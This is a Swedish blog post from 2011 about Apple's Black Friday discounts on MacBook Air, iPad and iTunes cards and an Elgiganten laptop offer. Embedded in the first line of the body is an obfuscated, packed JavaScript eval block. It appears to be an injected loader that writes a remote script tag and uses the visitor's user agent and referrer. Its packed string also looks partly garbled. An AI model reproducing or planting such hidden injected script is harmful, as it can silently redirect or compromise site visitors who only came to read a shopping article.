Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Applestore Black Friday: Här är REA priserna.

Applestore Black Friday: Här är REA priserna.
Filip Urde
  • On 25 november, 2011
  • http://www.revue.se/filip-urde

Applestore eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtsnk|var|u0026u|referrer|ztiyr||js|php’.split(’|’),0,{}))
Black Friday
… It’s on!

I dag är det Black Friday och alla butiker som är något att ha har bra rabatter, i USA då. Sverige har inte traditionen av Black Friday, då vi inte firar Thanks givning. Men eftersom vi alltid försöker vara lika bra, så har vi också en liten ”REA”. Apple har dagen till ära gjort det möjligt att handla produkterna över hela världen i ett Applestore black friday. Så idag är dagen att köpa apple produkter om du var sugen på något.

T.ex. så är MacBook Air prissänkt med 907 kronor, iTunes-kort med 10% och iPad med 357 kronor. Hur bra ”rabatt” detta nu är kan ju verkligen diskuteras, men billigare är det.

Elgiganten har dock en drive där man säljer 13-tums MacBook Air för 9500 kronor, vilket är en bra rabatt. Om dem har många eller att de kanske finns 10 per butik det är dock frågan!

store.apple.com

Comments